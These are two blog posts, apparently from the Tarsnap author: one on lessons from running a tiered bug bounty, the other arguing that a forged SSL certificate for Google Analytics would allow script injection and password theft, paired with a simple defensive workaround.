Lessons learned from bountying bugs

A bit over a week ago, I wrote here about the
$1265 of Tarsnap
bugs fixed as a result of the
Tarsnap bug bounty
which I've been running since April. I was impressed by the amount of
traffic that post received — over 82000 hits so far — as
well as the number of people who said they were considering following
my example. For them and anyone else interested in "crowdsourcing" bug
hunting, here's some of the lessons I learned over the past few months.

Small bugs are important!

Bug bounties aren't new; but most of the recent ones have focused strictly
on security vulnerabilities. With Tarsnap, I decided to offer a range of
bounties — up to $1000 for security vulnerabilities, but down to $1
for "cosmetic" errors such as spelling mistakes in source code comments.
My initial motivation for these was mostly as a proof-of-work: My primary
concern was to get people looking at the source code, and finding even
purely cosmetic errors is a sign that the code has been inspected.

It turned out that there was a more important benefit to offering bounties
for small bugs: dopamine. If only major bugs received bounties, people
could easily get discouraged after a few hours and stop looking; but the
presence of small errors — a typo here, a punctuation error there
— provides very much the same effect as the occasional small wins
afforded by slot machines, encouraging people to keep going. I feel a
bit guilty about taking advantage of human behaviour like this, to be
perfectly honest (even though it wasn't deliberate); but at least code
auditing is inherently a more productive activity than pulling a lever
on a slot machine.

What is a bug?

Having established that it's worth awarding small bounties for small bugs,
the next question is to decide what qualifies as a bug. Does a bug need
to result in something breaking? Does it need to have any user-observable
effect? Does it even need to result in a different sequence of machine
language instructions being produced? Ultimately I answered no to all of
these questions: To me, a bug is any place where the code is wrong,
regardless of the consequences. Case in point: I consider any instance
of C99 "undefined behaviour" to be a bug, even if — as in cases
such as memcpy(foo, NULL, 0); — no C library in the world
fails to do what was intended.

While this may seem like quibbling over trifles, there is a real benefit
to taking this position. The Tarsnap codebase is not static; I add new
features and make performance improvements on a regular basis (recently
most of these have been on the server side, but the server shares a lot
of code with the client). A mistake in a function might have no effect
today based on how the function is used, but start causing problems
tomorrow; better to fix problems now than to wait until they start to
break things.

How serious is a bug?

I set four main tiers for bugs: Security issues, worth $500-1000; bugs
which could plausibly cause problems for users, worth $50-100; "harmless"
bugs, worth $10; and "cosmetic" errors, worth $1. There weren't any
security issues reported, and the $1 bugs were generally clear; but
between the $10 and $50 levels there were some distinctly borderline
bugs. Take for instance an input-checking error in
the tarsnap-keygen utility which would result in a request
being sent to — and rejected by — the Tarsnap server instead
of being rejected by the client utility. The correct outcome in such a
case was "exit with an error", and to that extent the resulting behaviour
was correct; but on the other hand the error message printed —
"too many network failures" — was definitely not a good depiction
of what the problem was. In another case, a bug could only be triggered by
a peculiar and meaningless set of command-line options — sure, the
code was wrong, but who would ever run into the problem?

In cases like this, a simple rule guided my decisions: Be fair, and
explain decisions. The tarsnap-keygen bug I awarded $20
because I couldn't decide between $10 and $50; in another case I awarded
two very similar bugs from the same reporter $10 and $50 respectively,
explaining that they were both borderline so erring on the high side for
one and on the low side for the other seemed the fairest thing to do.

Open source code

Tarsnap is built around the excellent foundation provided by
libarchive, and one
of the greatest challenges I had was to figure out how to handle bugs
reported in libarchive code. Roughly 2/3 of the bugs reported were in
libarchive code — slightly more than the "fair share" based on
the amount of code in Tarsnap, but libarchive has the disadvantage of
having been written by multiple authors — but these took far more
than 2/3 of my time, for one simple reason: I often didn't know the code
very well. With bug reports relating to "my" code I could almost always
see immediately what was wrong and how it should be fixed; but for bugs
in libarchive it wasn't always clear how the code in question worked,
and on several occasions I had to write to other libarchive developers
and ask for their help.

When I launched the Tarsnap bug bounty, one of my greatest concerns was
that paying for bugs would somehow upset the balance between libarchive
— an open source project — and Tarsnap — a commercial
service. I'm happy to say that this didn't occur in the slightest; people
were simply happy that I was fixing bugs. (It's possible that the reaction
would have been different if libarchive were a GPL project, but in the
BSD community there is a long history of companies voluntarily
giving back because they realize it's to their advantage to do so
— no coercive licenses required.)

Advice to bounty-offerers

I've been very pleased with the success of the Tarsnap bug bounty so far,
and I'd urge any companies with public source code to establish similar
bounties. Based on the above lessons and other observations I've made,
here's some brief advice:

Offer bounties for anything which is wrong. Fix everything, even
if it's a bug which "doesn't matter".

Announce different levels of bounties. Orders of magnitude work well.

Don't feel that you have to stick to the levels you've announced if
you've got something which doesn't fit well. Being fair is most
important — people who report bugs usually care more about feeling
respected than getting every possible dollar from you.

When dealing with "upstream" open source code:

Make sure that you know people in the upstream project whom you can ask
for advice about bugs in code you don't understand.

When a bug report comes in, check the upstream project first: They might
have already fixed it, in which case you can save yourself a lot of time.

Make sure you feed bug fixes back upstream! Nothing will alienate an
open source project faster than finding out that you fixed bugs and didn't
tell them.

Publish a list of bounty winners. There's a lot of people out there who
care more about being able to point at their name on a list than getting
paid.

Where now?

The Tarsnap bug bounties will continue; I already have several emails
reporting minor bugs to be fixed in the next Tarsnap release. I hope
other people will follow my example — if anyone out there is
interested in doing this I'd be happy to answer questions over email.
But even if nobody else starts offering bug bounties, there's new code
to inspect: As of now, I'm extending the Tarsnap bug bounty to cover
open-source "spin-offs" from Tarsnap: the
scrypt key derivation
and encryption utility, the
kivaloo data store,
and the
spiped secure pipe
daemon.

Iran forged the wrong SSL certificate

There has been a lot of talk recently about how someone — whom
everyone presumes is the Iranian government — obtained a fake
SSL certificate for *.google.com from DigiNotar; this is the
second such case this year, as in March someone (again, presumed to be
the Iranian government) obtained fraudulent certificates from Comodo for
Firefox extensions, Google, Gmail, Skype, Windows Live, and Yahoo.
(Interestingly, while everybody is removing DigiNotar's certificate
authority key from their trusted lists, Comodo — which has issued
far more certificates — is still widely trusted. I wonder if they
got a free ride because nobody wants to ship "the web browser which
doesn't work with my bank".)

If you want to be really evil, however, *.google.com is the
wrong SSL certificate to forge. The right one?
ssl.google-analytics.com.

By many reports, Google Analytics is used by almost half of the top
million websites, and an even greater proportion of high profile sites.
The way Google Analytics works, each web page has a <script> tag
which loads the Google Analytics javascript; that code then gathers
information and forwards it to Google. Privacy issues aside, it works
well — as long as the javascript does what it should.

If the javascript has been tampered with, it could do anything javascript
can normally do — and does so with the permissions of the web page
it is running from. Read all the text on the page? No problem. Read
the passwords you're typing in? Easy. Send it all to
evil-democracy-suppressors.gov.ir? Easy to do using one or
more web bugs.

When accessing sites via HTTPS, if Google Analytics is correctly installed
the request to fetch the Google Analytics javascript will also be
performed via HTTPS (if not, good web browsers will display a warning
message); but if you have an SSL certificate for
ssl.google-analytics.com you can supply your evil javascript
anyway.

Sooner or later it's going to happen; obtaining forged SSL certificates
is just too easy to hope otherwise. What can we do about it? Don't
load the Google Analytics javascript when your site is accessed via
HTTPS. This is easy to do: Just throw a
if("http:" == document.location.protocol) around the
document.write or s.parentNode.insertBefore code
which loads the Google Analytics javascript. On the website for my
Tarsnap online backup service
I've been doing this for years — not just out of concern for the
possibility of forged SSL certificates, but also because I don't want
Google to be able to steal my users' passwords either!

And if you trust Google and you're not worried about Iran's demonstrated
ability to obtain forged SSL certificates, ask yourself this: Do you
trust the Chinese Ministry of Information Industry? Because
your
web browser probably does.